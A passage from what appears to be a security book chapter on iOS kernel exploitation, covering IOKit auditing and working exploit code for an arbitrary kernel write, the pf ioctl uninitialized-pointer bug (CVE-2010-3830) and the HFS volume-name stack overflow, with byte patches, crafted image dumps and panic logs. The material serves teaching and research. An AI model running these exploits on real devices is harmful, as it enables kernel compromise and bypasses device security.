   uint32_t       *outputCnt,         // In/Out
   void           *outputStruct,      // Out
   size_t         *outputStructCnt)   // In/Out
AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;

The function is called with a lot of parameters to allow a broad usage. The first two arguments define the connection to the driver and the numerical index of the function called. The following four arguments describe the input parameters to the external method, and the remaining four arguments describe the possible output parameters. For input and output, there are two types of arguments each: scalar and structure. Scalar parameters are just 64-bit integers, and structure parameters are arbitrary data structures in a format known only to the kernel driver and its user space client. There can be multiple scalar input and output parameters, but only one structure as input and output, and you must submit the size of the structure.

At the kernel level, IOKit drivers can implement external methods, by choosing to overwrite several different methods of the IOUserClient class. The most general method that can be overwritten is the ExternalMethod() method. This method is not only responsible for finding the selected external method, but it also checks the supplied parameters against the requirements, calls the actual method, and handles the output in the correct way. User clients that completely overwrite this method have to ensure to pass execution to the parent method or implement everything on their own, which can be the cause of lots of security problems. Therefore, the overwritten ExternalMethod() methods should be carefully audited. A more convenient way to implement this is to overwrite one of the helper methods used by the base implementation. These helper methods are getAsyncTargetAndMethodForIndex(), getExternalMethodForIndex(), getExternalAsyncMethodForIndex(), and getTargetAndMethodForIndex(). Each of these methods is supposed to look up the external method by index and optionally determine the target object. No matter what function the user client implementation overwrites, you have to check that they validate the index and that an illegal index does not lead to arbitrary lookups in attacker-controlled memory pages. And again, the actual external methods have to be audited for the usual security problems arising from putting too much trust into function arguments.

While reversing the IOKit drivers within the kernelcache and looking for IOKit-related vulnerabilities, the scripts within the idaios toolkit, combined with the new IDA 6.2 list filtering feature, will come in very handy, as demonstrated in Figure 9.5.

Figure 9.5 IDA Filtering IOKit Drivers

9.5

Kernel Exploitation

This section discusses the exploitation of four very common vulnerability classes you face in kernel exploitation. It explains the involved vulnerabilities in detail and shows how exploits can be built for each of them. The discussion contains C code snippets of the original exploits used. It is, however, important to realize that since the introduction of the iOS 4.3 kernel, no known shortcuts exist to disable the code-signing functionality, even as the root user. In versions prior to iOS 4.3, it was possible for the root user to disable the security.mac.proc_enforce and security.mac.vnode_enforce sysctl entries from user space. This would disable several security checks in the code-signing functionality and allow the user to launch kernel exploits from an incorrectly signed Mach-O binary. But with the introduction of iOS 4.3, these sysctl entries were made read-only. Therefore, all kernel exploits for more recent versions of iOS have to be implemented as 100 percent return oriented programming (ROP) payloads, unless they are launched from within a process that has dynamic code-signing capabilities. Launching kernel exploits as a non-root user always had this requirement.

Arbitrary Memory Overwrite

Exploiting an arbitrary kernel memory overwrite vulnerability allows you to write anything you want anywhere within the kernel's address space. Although vulnerabilities like this have been found and fixed in the past, this example doesn't exploit a real vulnerability, but instead shows you how to patch the kernel and introduces an artificial vulnerability. But, before you can do this you need a kernel binary with the jailbreaking kernel patches already applied. The easiest way to create this is to use the kernel patch generator by comex. You can find it on Github at http://github.com/comex/datautils0. Once compiled, it provides two utilities that you can use to create a jailbroken kernel. We will not go into the actual kernel patches it provides at this point, because this is discussed in Chapter 10.

$ ./make_kernel_patchfile kernelcache.iPod4,1_4.3.5_8L1.decrypted
 mykernelpatchfile
$ ./apply_patchfile kernelcache.iPod4,1_4.3.5_8L1.decrypted 
    mykernelpatchfile kernelcache.iPod4,1_4.3.5_8L1.patched
vm_map_enter (0x80043fc8)
vm_map_protect (0x8004115e)
AMFI (0x80618394)
-debug_enabled initializer (0x80204d9c)
task_for_pid 0 (0x801a7df6)
cs_enforcement_disable (0x8027eb5c)
proc_enforce (0x8029c1e4)
USB power (0x805eab92)
sb_evaluate hook (0x8061b6d4)
sb_evaluate (0x80938e9c)

Patching a Vulnerability into the Kernel

Now that you have a jailbroken kernel binary you can add your own vulnerability into it. To do this you have to find and replace the following bytes in the kernel binary:

Original 68 46 10 22 F7 F6 26 EC F3 E7 00 BF
Patched  68 46 10 22 F7 F6 70 EE 00 20 F2 E7

You then use the redsn0w utility from the iPhone Dev Team to boot the patched kernel:

$ ./redsn0w  -j -k kernelcache.iPod4,1_4.3.5_8L1.patched -a "-v"

Before you continue, take a look at the patch you applied and how the introduced vulnerability looks. The code you patched is within the getrlimit() system call. Within the system call handler, you can find the following code near the end that uses the copyout() function to copy the result back into user space. The copyout() function is responsible for checking that the destination address is actually within user space memory so that one cannot write the result into kernel memory. The disassembly of the original code is:

80175628   MOV    R0, SP
8017562A   MOVS   R2, #0x10
8017562C   BLX    _copyout
80175630   B      loc_8017561A

The applied patch changes the call of copyout() into a call of ovbcopy(), which does not perform any checks and therefore allows a target address to be specified anywhere within kernel memory. In addition to that, the applied patch clears the R0 register to signal a successful copy operation, which looks in assembly like this:

80175628   MOV    R0, SP
8017562A   MOVS   R2, #0x10
8017562C   BLX    _ovbcopy
80175630   MOVS   R0, #0
80175632   B      loc_8017561A

This means you can write the result of the getrlimit() system call to kernel memory, by using a pointer to kernel memory as second parameter:

getrlimit(RLIMIT_CORE, 0x80101010);

Because this vulnerability allows you to write an rlimit structure anywhere in kernel memory, you have to look into its definition:

struct rlimit {
   rlim_t  rlim_cur; /* current (soft) limit */
   rlim_t  rlim_max; /* hard limit */
};

Within iOS, the data-type rlim_t is a 64-bit unsigned integer, but only 63 of its bits are used. The highest bit is supposed to be zero. Therefore, only the first seven bytes of the result can be arbitrarily chosen. This is not a problem, because you can perform the exploit repeatedly. There is also the restriction that the value of rlim_cur is not allowed to be greater than rlim_max. This means your exploit code needs to use a resource limit that is initially set to infinity (all 63 bits set), because otherwise not all seven bytes can be written. In the case of RLIMIT_CORE, this is the default. So to write the bytes 11 22 33 44 55 66 77 to the kernel, you have to do something like this:

getrlimit(RLIMIT_CORE, &rlp);
rlp.rlim_cur = 0x77665544332211;
setrlimit(RLIMIT_CORE, &rlp);
getrlimit(RLIMIT_CORE, 0x80101010);

To write an arbitrary amount of data to the kernel, you can wrap this exploit into a function that repeatedly uses the vulnerability:

void writeToKernel(unsigned char *addr, unsigned char *buffer,
size_t len)
{
    struct rlimit rlp;
    getrlimit(RLIMIT_CORE, &rlp);
    while (len > 7) {
        memcpy(&rlp, buffer, 7);
        setrlimit(RLIMIT_CORE, &rlp);
        getrlimit(RLIMIT_CORE, addr);
        len -= 7; buffer += 7; addr += 7;
    }
    memcpy(&rlp, buffer, len);
    setrlimit(RLIMIT_CORE, &rlp);
    getrlimit(RLIMIT_CORE, addr);
}

Choosing a Target to Overwrite

Once you can write anything, you need to decide what you should overwrite. Historically, this has been used in Mac OS X kernel exploits to overwrite the processes' user credentials inside kernel memory to leverage its privileges. For iOS and newer Mac OS X kernels, this is no longer sufficient, because you often have to deal with kernel-level sandboxing. Just changing the process's user ID to zero will not be enough to gain full access to the system. Instead, you always have to go for arbitrary code execution inside the kernel. To achieve this you need to overwrite a kernel-level function pointer or saved return address and redirect the kernel's execution path to your own code.

One way to do this is to overwrite one of the unused system call handlers in the system call table and then trigger the execution from user space by calling the system call in question. iOS contains quite a lot of unused system call table entries. The kernel exploits for jailbreaking the iPhone have used the table entries 0 and 207 before, without running into trouble from other software. The second problem you have to solve in your exploit is to introduce code into the kernel to which you can jump. You have many different ways to solve this, and several of them are discussed in the remaining sections. This example employs a specific attack that can be used when you can write anything anywhere in kernel memory. You overwrite the executable and writable slack space in kernel memory with your code. Such unused space you can find, for example, in the … Each contained kernel extension comes with a Mach-O header and has some unused space between the end of the header and the beginning of the next segment.

For this exploit it means you have to know the exact location of the system call table and the slack space in kernel memory. Because there is no ASLR protection at the kernel level, these addresses are static for the same device and kernel version and have to be found only once for all the released firmware builds. To cover all versions of iOS 4, without support for AppleTV, you have up to 81 different possible addresses. However, some of these addresses will be the same because, on the one hand, not every iOS version introduces (bigger) changes in the kernel and, on the other hand, the main kernel code segment is byte identical for devices of the same processor type. Therefore you can write a script for finding the addresses for all available kernels and create a lookup table for your kernel exploit.

Locating the System Call Table

Locating the system call table has become more difficult in recent kernel updates, because Apple has moved some kernel symbols around and removed others completely. Previously you could use symbols like kdebug_enable to locate the table easily. A new method for locating the table relies on the structure of the first entry and its relative position to the nsysent variable. An entry in the system call table is called sysent:

struct sysent {                /* system call table */
   int16_t sy_narg;            /* number of args */
   int8_t  sy_resv;            /* reserved  */
   int8_t  sy_flags;           /* flags */
   sy_call_t *sy_call;         /* implementing function */
   sy_munge_t *sy_arg_munge32; /* syscall arguments munger for 32-bit */
   sy_munge_t *sy_arg_munge64; /* syscall arguments munger for 64-bit */
   int32_t    sy_return_type;  /* system call return types */
   uint16_t   sy_arg_bytes;    /* Total size of arguments in bytes for
                                * 32-bit system calls
                                */
};

Because the first entry of the system call table is not actually an implemented system call, most of its structure elements are initialized to zero. The only fields set are the sy_return_type and sy_call elements. The return type is initialized to the value 1 and the handler is some pointer into the code segment of the kernel. In addition to that you know that the system call table is located within the data segment of the kernel. You can therefore scan the data segment for data that matches the definition of the first entry. To verify that you found the table, you can use the fact that the nsysent variable is stored directly behind the table. This means you start by choosing a guessed number of system calls, and check if the formula &nsysent = &sysent + sizeof(sysent) * nsysent validates. If not, you keep increasing, until you reach a high number, and have to assume that your guessed address for sysent was wrong. In this case, you have to continue searching within the data segment for the real first entry.

The idaiostoolkit contains a script that automates this search and also uses the syscalls.master file from the XNU source code to set all the symbols and function types for the system call handlers. The following is the script's output for the example iOS 4.3.5 firmware for iPod4:

Found syscall table _sysent at 802926e8
Number of entries in syscall table _nsysent = 438
Syscall number count _nsysent is at 80294ff8

Constructing the Exploit

Finding a suitable slack space is much easier, because you just have to check the _PRELINK_TEXT segment for empty space after a MACH-O header of one of the kernel extensions. A suitable gap with a size of 3328 bytes is the memory between 0x8032B300 and 0x8032C000. You can use this within your exploit.

char shellcode[] = "x01x20x02x21x03x22x04x23xFFxFF";
struct sysent scentry;
unsigned char * syscall207 = 0x802926e8 + 207 * sizeof(scentry);
unsigned char * slackspace = 0x8032B300;
   
memset(&scentry, 0, sizeof(scentry));
scentry.sy_call = slackspace + 1;
scentry.sy_return_type = 1;
   
writeToKernel(slackspace, &shellcode, sizeof(shellcode));
writeToKernel(syscall207, &scentry, sizeof(scentry));
syscall(207);

The shellcode in this exploit is simple thumb code that just moves some values into the registers R0-R3 and then panics due to an undefined instruction. This is merely to prove that some kind of execution occurred. Full kernel-level payloads are discussed in Chapter 10.

MOVS   R0, #1
MOVS   R1, #2
MOVS   R2, #3
MOVS   R3, #4
UNDEFINED

When your exploit is executed it causes a kernel panic, and the paniclog shows that your code was executed and the registers filled accordingly. The program counter PC shows a crash occurred when an undefined kernel instruction from within the slack space was executed and the value of R5 hints to the execution of syscall handler 207.

panic(cpu 0 caller 0x8006fcf8): undefined kernel instruction
r0: 0x00000001  r1: 0x00000002  r2: 0x00000003  r3: 0x00000004
r4: 0x856e02e0  r5: 0x000000cf  r6: 0xc0a886ac  r7: 0xcd273fa8
r8: 0x00000001  r9: 0xc0a884b0 r10: 0x80293a50 r11: 0x832b8244
12: 0x00000000  sp: 0xcd273f90  lr: 0x801a96e8  pc: 0x8032b308
cpsr: 0x20000033 fsr: 0x856e02e0 far: 0xcd273fa8

This should be enough to show how easy it is to achieve arbitrary kernel code execution if you are able to write directly into kernel memory. The exploit gets harder if the vulnerability does not allow you to write whatever you want, but limits the possible values to write. However, the vulnerability discussed in the next section shows that even very limited kernel memory manipulations can still lead to arbitrary code execution.

Uninitialized Kernel Variables

This exploit causes an uninitialized pointer element within a kernel structure to get filled from user space. The vulnerability is located within the IOCTL handler of the packet filter device and was discovered and exploited by comex. His exploit was then used within the limera1n jailbreaking tool for untethering iOS 4.1. Apple fixed this vulnerability, which is also known as CVE-2010-3830 within iOS 4.2.1. Therefore, you can exploit this vulnerability only on devices running iOS 4.1 and below.

To understand the vulnerability, you can take a look at the IOCTL handler of the packet filter device, because it is part of the original XNU kernel source. The source tree needs to be only old enough to still be vulnerable (for example, xnu-1504.9.17). The vulnerable IOCTL handler is defined inside the file /bsd/net/pf_ioctl.c as follows:

static int
pfioctl(dev_t dev, u_long cmd, caddr_t addr, int flags, struct proc *p)
{
   /* ... */
   switch (cmd) {
   /* ... */
   case DIOCADDRULE: {
      struct pfioc_rule *pr = (struct pfioc_rule *)addr;
      struct pf_ruleset *ruleset;
      struct pf_rule    *rule, *tail;
     
      /* ... copying and initializing part of the structure */
      bcopy(&pr->rule, rule, sizeof (struct pf_rule));
      rule->cuid = kauth_cred_getuid(p->p_ucred);
      rule->cpid = p->p_pid;
      rule->anchor = NULL;
      rule->kif = NULL;
      TAILQ_INIT(&rule->rpool.list);
      /* initialize refcounting */
      rule->states = 0;
      rule->src_nodes = 0;
      rule->entries.tqe_prev = NULL;

      /* ... copying and initializing part of the structure */
      if (rule->overload_tblname[0]) {
         if ((rule->overload_tbl = pfr_attach_table(ruleset,
              rule->overload_tblname)) == NULL)
             error = EINVAL;
         else
            rule->overload_tbl->pfrkt_flags |= PFR_TFLAG_ACTIVE;
      }

The important part in this code is that the structure element overload_tbl is not initialized if the overload_tblname is an empty string. This would be fine if all other parts of the code would use the same check, but other parts only check that overload_tbl is not a NULL pointer. To abuse this you have to trigger a call of the pf_rm_rule() function that is used to remove a rule:

void
pf_rm_rule(struct pf_rulequeue *rulequeue, struct pf_rule *rule)
{
   if (rulequeue != NULL) {
      if (rule->states <= 0) {
         /*
          * XXX - we need to remove the table *before* detaching
          * the rule to make sure the table code does not delete
          * the anchor under our feet.
          */
         pf_tbladdr_remove(&rule->src.addr);
         pf_tbladdr_remove(&rule->dst.addr);
         if (rule->overload_tbl)
            pfr_detach_table(rule->overload_tbl);
      }

To trigger such a code path you can simply let the DIOCADDRULE IOCTL handler fail. However, several other ways exist, and comex decided to use the PF_CHANGE_REMOVE action of the DIOCCHANGERULE IOCTL call instead:

case DIOCCHANGERULE:
   /* ... */
   if (pcr->action == PF_CHANGE_REMOVE) {
      pf_rm_rule(ruleset->rules[rs_num].active.ptr, oldrule);
      ruleset->rules[rs_num].active.rcount--;
   } else {

No matter which method is chosen, the code finally calls the pfr_detach_table() function to decrease the reference counter of the table:

void
pfr_detach_table(struct pfr_ktable *kt)
{
   lck_mtx_assert(pf_lock, LCK_MTX_ASSERT_OWNED);

   if (kt->pfrkt_refcnt[PFR_REFCNT_RULE] <= 0)
      printf("pfr_detach_table: refcount = %d.
",
      kt->pfrkt_refcnt[PFR_REFCNT_RULE]);
   else if (!--kt->pfrkt_refcnt[PFR_REFCNT_RULE])
      pfr_setflags_ktable(kt, kt->pfrkt_flags&∼PFR_TFLAG_REFERENCED);
}

It is important to remember that the attacker controls the kt pointer that is used within this function by setting the overload_tbl pointer accordingly. This means a user space process can use this vulnerability to decrease an integer stored anywhere in kernel memory. The only limitation is that the value cannot be smaller than or equal to zero. Before we discuss how you can use this arbitrary memory decrease vulnerability to execute your own code, take a look at comex's exploit code. First, it opens the packet filter device and resets it via IOCTL. It then calls the pwn() function repeatedly, which implements the actual exploit and decreases the supplied address a defined number of times:

// Yes, reopening is necessary
pffd = open("/dev/pf", O_RDWR);
ioctl(pffd, DIOCSTOP);
assert(!ioctl(pffd, DIOCSTART));
while(num_decs--)
   pwn(<patchaddress>);
assert(!ioctl(pffd, DIOCSTOP));
close(pffd);

Within the pwn() function, the necessary structures are set up and the vulnerable IOCTL handlers are called to first add the malicious rule and immediately remove it afterwards. This decreases the supplied memory address by one.

static void pwn(unsigned int addr) {
    struct pfioc_trans trans;
    struct pfioc_trans_e trans_e;
    struct pfioc_pooladdr pp;
    struct pfioc_rule pr;

    memset(&trans, 0, sizeof(trans));
    memset(&trans_e, 0, sizeof(trans_e));
    memset(&pr, 0, sizeof(pr));

    trans.size = 1;
    trans.esize = sizeof(trans_e);
    trans.array = &trans_e;
    trans_e.rs_num = PF_RULESET_FILTER;
    memset(trans_e.anchor, 0, MAXPATHLEN);
    assert(!ioctl(pffd, DIOCXBEGIN, &trans));
    u_int32_t ticket = trans_e.ticket;

    assert(!ioctl(pffd, DIOCBEGINADDRS, &pp));
    u_int32_t pool_ticket = pp.ticket;

    pr.action = PF_PASS;
    pr.nr = 0;
    pr.ticket = ticket;
    pr.pool_ticket = pool_ticket;
    memset(pr.anchor, 0, MAXPATHLEN);
    memset(pr.anchor_call, 0, MAXPATHLEN);

    pr.rule.return_icmp = 0;
    pr.rule.action = PF_PASS;
    pr.rule.af = AF_INET;
    pr.rule.proto = IPPROTO_TCP;
    pr.rule.rt = 0;
    pr.rule.rpool.proxy_port[0] = htons(1);
    pr.rule.rpool.proxy_port[1] = htons(1);

    pr.rule.src.addr.type = PF_ADDR_ADDRMASK;
    pr.rule.dst.addr.type = PF_ADDR_ADDRMASK;
   
    pr.rule.overload_tbl = (void *)(addr - 0x4a4);
   
    errno = 0;

    assert(!ioctl(pffd, DIOCADDRULE, &pr));

    assert(!ioctl(pffd, DIOCXCOMMIT, &trans));

    pr.action = PF_CHANGE_REMOVE;
    assert(!ioctl(pffd, DIOCCHANGERULE, &pr));
}

The most important part here is that the exploit subtracts the value 0x4a4 from the address you want to decrease. This has to be done, because it is the offset of the reference counter within the table structure.

Now that you can decrement a value anywhere within kernel memory, the question is, how can you turn this into an arbitrary code execution exploit? And the answer is that quite a number of possibilities exist. Because you can repeat the exploit an unlimited number of times, you can zero out parts of the kernel code, which will be decoded as MOVS R0,R0 in thumb code. This is more or less a NOP, and therefore you can use it to overwrite security checks. That way you can introduce new vulnerabilities like stack buffer overflows.

An easier attack is to decrement the highest byte of a kernel-level function pointer. By repeatedly decrementing, it is possible to move the kernel-level function pointer into the user space memory area. Comex uses this approach in his exploit and decrements the system call handler 0 until it points into user space memory. Afterwards he uses the mmap() system call to map memory at this address. The mapped memory is then filled with trampoline code that jumps into the code segment of the exploit:

unsigned int target_addr = CONFIG_TARGET_ADDR;
unsigned int target_addr_real = target_addr & ∼1;
unsigned int target_pagebase = target_addr & ∼0xfff;
unsigned int num_decs = (CONFIG_SYSENT_PATCH_ORIG - target_addr) >> 24;
assert(MAP_FAILED != mmap((void *) target_pagebase, 0x2000, PROT_READ |
PROT_WRITE, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0));
unsigned short *p = (void *) target_addr_real;
if(target_addr_real & 2) *p++ = 0x46c0; // nop
*p++ = 0x4b00; // ldr r3, [pc]
*p++ = 0x4718; // bx r3
*((unsigned int *) p) = (unsigned int) &ok_go;
assert(!mprotect((void *)target_pagebase,
0x2000, PROT_READ | PROT_EXEC));

Once everything is in place, the arbitrary code execution is triggered by executing syscall(0).

Kernel Stack Buffer Overflows

Kernel-level stack buffer overflow vulnerabilities are usually caused by an unrestricted copy operation into a stack-based buffer. Whenever this happens, the saved return address on the kernel stack can be overwritten and replaced with a pointer to your shellcode. As you saw in the previous examples, iOS allows returning to code that was injected into writable kernel memory or returning into code that already existed in the user space memory range. Unlike in user space, there are no exploit mitigations within the kernel; therefore, exploiting a kernel-level stack buffer overflow in iOS 4 is pretty straightforward. It nearly always comes down to overwriting the return address and returning into code already prepared from user space. In iOS 5 it is a little bit more difficult and usually requires the use of some kernel-level return oriented programming.

The example for this vulnerability class was discovered by pod2g and is known as the HFS legacy volume name stack buffer overflow. It is caused by an unrestricted character-set copy and conversion function that is called while mounting a legacy HFS filesystem. An exploit for this vulnerability was first distributed with the iOS 4.2.1 jailbreak. It consists of three parts. The first part is merely a piece of code that mounts a malicious, HFS filesystem from an image file. The second part is the malicious image itself that triggers the buffer overflow, and the third and last part is the actual payload code that is mapped at the specific position to which the exploit returns.

Before you look into the actual exploit you first have to look at the vulnerable code. It is part of the XNU kernel code and therefore available as open source. The vulnerable code is located within the file /bsd/hfs/hfs_encoding.c inside the function mac_roman_to_unicode():

int
mac_roman_to_unicode(const Str31 hfs_str, UniChar *uni_str,
                     unused u_int32_t maxCharLen, u_int32_t
*unicodeChars)
{
   const u_int8_t  *p;
   UniChar  *u;
   u_int16_t  pascalChars;
   u_int8_t  c;

   p = hfs_str;
   u = uni_str;

   *unicodeChars = pascalChars = *(p++);   /* pick up length byte */

   while (pascalChars--) {
      c = *(p++);

      if ( (int8_t) c >= 0 ) {    /* check if seven bit ascii */
         *(u++) = (UniChar) c;    /* just pad high byte with zero */
      } else { /* its a hi bit character */
         /* ... */
      }
   }

   return noErr;
}

A few things are very interesting about this function. First of all, the function is called with a parameter specifying the maximum number of bytes in the output buffer (maxCharLen). You can also see that this parameter is not used at all inside the function. Instead, the string is expected to be in Pascal format, which means the first byte defines the length. This length field is fully trusted by the copy and conversion loop. There is no check that protects against overwriting the end of the buffer. The next important thing here is that the output character width is 16 bit, which means that every second byte will be zero. The only exceptions are characters with ASCII values above 127. Those are converted by some lookup table that severely limits the possible outputs. The code was omitted, because it is not usable for the exploit. Because every second byte is filled with zero, you can return into only the first 24 megabytes of user space memory, and therefore don't really have a chance to use one of the other exploitation methods.

When mounting an HFS image, the call to mac_roman_to_unicode() comes from within the function hfs_to_utf8(), which is also defined within the file /bsd/hfs/hfs_encoding.c. The call is via a function pointer.

int
hfs_to_utf8(ExtendedVCB *vcb, const Str31 hfs_str, ByteCount maxDstLen,
 ByteCount *actualDstLen, unsigned char* dstStr)
{
   int error;
   UniChar uniStr[MAX_HFS_UNICODE_CHARS];
   ItemCount uniCount;
   size_t utf8len;
   hfs_to_unicode_func_t hfs_
get_unicode = VCBTOHFS(vcb)->hfs_get_unicode;

   error = hfs_get_unicode(hfs_str, uniStr,
MAX_HFS_UNICODE_CHARS, &uniCount);

   if (uniCount == 0)
      error = EINVAL;

   if (error == 0) {
      error = utf8_encodestr(uniStr, uniCount * sizeof(UniChar),
                             dstStr, &utf8len, maxDstLen , ‘:’, 0);
      if (error == ENAMETOOLONG)
         *actualDstLen = utf8_encodelen(uniStr, uniCount *
sizeof(UniChar),
                                        ‘:’, 0);
      else
         *actualDstLen = utf8len;
      }

   return error;
}

Now have a look at the definition of the legacy HFS master directory header included as part of the XNU source code in the file /bsd/hfs/hfs_format.h. The master directory block is stored within the third sector of the filesystem and a copy is also stored in the second to last sector:

/* HFS Master Directory Block - 162 bytes */
/* Stored at sector #2 (3rd sector) and second-to-last sector. */
struct HFSMasterDirectoryBlock {
    u_int16_t       drSigWord;  /* == kHFSSigWord */
    u_int32_t       drCrDate;   /* date and time of volume creation */
    u_int32_t       drLsMod;    /* date and time of last modification */
    u_int16_t       drAtrb;     /* volume attributes */
    u_int16_t       drNmFls;    /* number of files in root folder */
    u_int16_t       drVBMSt;    /* first block of volume bitmap */
    u_int16_t       drAllocPtr; /* start of next allocation search */
    u_int16_t       drNmAlBlks; /* number of allocation blocks in volume */
    u_int32_t       drAlBlkSiz; /* size (in bytes) of allocation blocks */
    u_int32_t       drClpSiz;   /* default clump size */
    u_int16_t       drAlBlSt;   /* first allocation block in volume */
    u_int32_t       drNxtCNID;  /* next unused catalog node ID */
    u_int16_t       drFreeBks;  /* number of unused allocation blocks */
    u_int8_t        drVN[kHFSMaxVolumeNameChars + 1];  /* volume name */
    u_int32_t       drVolBkUp;  /* date and time of last backup */
    u_int16_t       drVSeqNum;  /* volume backup sequence number */
    ...

You can see that in the original definition a maximum number of kHFSMaxVolumeNameChars characters are allowed for the volume name. The source code defines this constant as 27. The code does not limit this field in any way, and therefore overlong volume names just get passed through to the Unicode conversion function. With this information you can now create a malicious HFS image that triggers the overflow:

$ hexdump -C exploit.hfs
 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000400  42 44 00 00 00 00 00 00  00 00 01 00 00 00 00 00  |BD..............|
 00000410  00 00 00 00 00 00 02 00  00 00 00 00 00 00 00 00  |................|
 00000420  00 00 00 00 60 41 41 41  41 42 42 42 42 43 43 43  |....‘AAAABBBBCCC|
 00000430  43 44 44 44 44 45 45 45  45 46 46 46 46 47 47 47  |CDDDDEEEEFFFFGGG|
 00000440  47 48 48 48 48 49 49 49  49 4a 4a 4a 4a 4b 4b 4b  |GHHHHIIIIJJJJKKK|
 00000450  4b 4c 4c 4c 4c 4d 4d 4d  4d 4e 4e 4e 4e 4f 4f 4f  |KLLLLMMMMNNNNOOO|
 00000460  4f 50 50 50 50 51 51 51  51 52 52 52 52 53 53 53  |OPPPPQQQQRRRRSSS|
 00000470  53 54 54 54 54 55 55 55  55 56 56 56 56 57 57 57  |STTTTUUUUVVVVWWW|
 00000480  57 58 58 58 58 00 00 00  00 00 00 00 00 00 00 00  |WXXXX...........|
 00000490  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000600

This HFS image contains an overlong volume name of 96 bytes, which should overflow the buffer in this case. Because the name consists of real letters from the alphabet, the Unicode conversion should transform all of them into illegal memory addresses, which heightens the probability of a crash. To mount the HFS image, you have to use the /dev/vn0 device:

int ret, fd; struct vn_ioctl vn; struct hfs_mount_args args;
   
fd = open("/dev/vn0", O_RDONLY, 0);
if (fd < 0) {
   puts("Can't open /dev/vn0 special file.");
   exit(1);
}
   
memset(&vn, 0, sizeof(vn));
ioctl(fd, VNIOCDETACH, &vn);
vn.vn_file = "/usr/lib/exploit.hfs";
vn.vn_control = vncontrol_readwrite_io_e;
ret = ioctl(fd, VNIOCATTACH, &vn);
close(fd);
if (ret < 0) {
    puts("Can't attach vn0.");
    exit(1);
}
   
memset(&args, 0, sizeof(args));
args.fspec = "/dev/vn0";
args.hfs_uid = args.hfs_gid = 99;
args.hfs_mask = 0x1c5;
ret = mount("hfs", "/mnt/", MNT_RDONLY, &args);

When you attempt to mount your previously constructed HFS image while running a vulnerable kernel, this immediately results in a kernel panic. You can analyze the crash dump to see what is going on:

Hardware Model:      iPod4,1
Date/Time:       2011-07-26 09:55:12.761 +0200
OS Version:      iPhone OS 4.2.1 (8C148)

kernel abort type 4: fault_type=0x3, fault_addr=0x570057
r0: 0x00000041  r1: 0x00000000  r2: 0x00000000  r3: 0x000000ff
r4: 0x00570057  r5: 0x00540053  r6: 0x00570155  r7: 0xcdbfb720
r8: 0xcdbfb738  r9: 0x00000000 r10: 0x0000003a r11: 0x00000000
12: 0x00000000  sp: 0xcdbfb6e0  lr: 0x8011c47f  pc: 0x8009006a
cpsr: 0x80000033 fsr: 0x00000805 far: 0x00570057

As you can see, the panic is due to an invalid memory access at address 0x570057, which is equal to the value of the R4 register. You can also see that the registers R4, R5, and R6 are controlled by the buffer overflow. However, you do not control the program counter PC, and therefore should have a look at the code near PC and also LR:

80090066                 CMP             R4, R6
80090068                 BCS             loc_80090120
8009006A
8009006A loc_8009006A    ; CODE XREF: _utf8_encodestr+192
8009006A                 STRB.W          R0, [R4],#1
8009006E                 B               loc_8008FFD6

As expected, the instruction at the PC tries to write to the R4 register and therefore causes the kernel panic. You can also see that you are within the function utf8_encodestr(), which is not the place you wanted to end up. By checking the code around LR you see that the call came from hfs_to_utf8(), which was expected:

8011C476                 MOVS            R5, #0x3A
8011C478                 STR             R5, [SP,#0xB8+var_B4]
8011C47A                 BL              _utf8_encodestr
8011C47E                 CMP             R0, #0x3F
8011C480                 MOV             R4, R0

From the source code you can see that you reach this code path only if the variable uniCount is not zero. This variable is overwritten by the buffer overflow, and therefore you can adjust your payload to fill it with a value of zero. The stack layout at the time of the overflow is shown in Figure 9.6.

Figure 9.6 layout at time of overflow

9.6

By looking at the stack layout, you can figure out where in the payload you have to change bytes in order to preset the values of uniCount, R4 to R7, and the program counter in PC:

$ hexdump -C exploit_improved.hfs
 00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000400  42 44 00 00 00 00 00 00  00 00 01 00 00 00 00 00  |BD..............|
 00000410  00 00 00 00 00 00 02 00  00 00 00 00 00 00 00 00  |................|
 00000420  00 00 00 00 60 58 58 58  58 58 58 58 58 58 58 58  |....‘XXXXXXXXXXX|
 00000430  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000440  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000450  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000460  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
 00000470  58 58 00 00 41 41 42 42  43 43 44 44 45 45 46 46  |XX..AABBCCDDEEFF|
 00000480  47 47 48 48 58 00 00 00  00 00 00 00 00 00 00 00  |GGHHX...........|
 00000490  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
 *
 00000600

Now after mounting the new file again you can analyze the generated paniclog and check if your assumptions were correct. Indeed, you can see that all the registers are filled with the expected values. In addition to that, you can also see that the panic was caused by the CPU trying to read the next instruction at 0x450044, which shows that you successfully hijacked the code flow:

Hardware Model:      iPod4,1
Date/Time:       2011-07-26 11:05:23.612 +0200
OS Version:      iPhone OS 4.2.1 (8C148)

sleh_abort: prefetch abort in kernel mode: fault_addr=0x450044
r0: 0x00000016  r1: 0x00000000  r2: 0x00000058  r3: 0xcdbf37d0
r4: 0x00410041  r5: 0x00420042  r6: 0x00430043  r7: 0x00440044
r8: 0x8a3ee804  r9: 0x00000000 r10: 0x81b44250 r11: 0xc07c7000
12: 0x89640c88  sp: 0xcdbf37e8  lr: 0x8011c457  pc: 0x00450044
cpsr: 0x20000033 fsr: 0x00000005 far: 0x00450044

To finalize your exploit you need to map some shellcode to the address 0x450044 with mmap() from user space, or change the HFS image to return to a different address where your shellcode is already mapped.

Kernel Heap Buffer Overflows

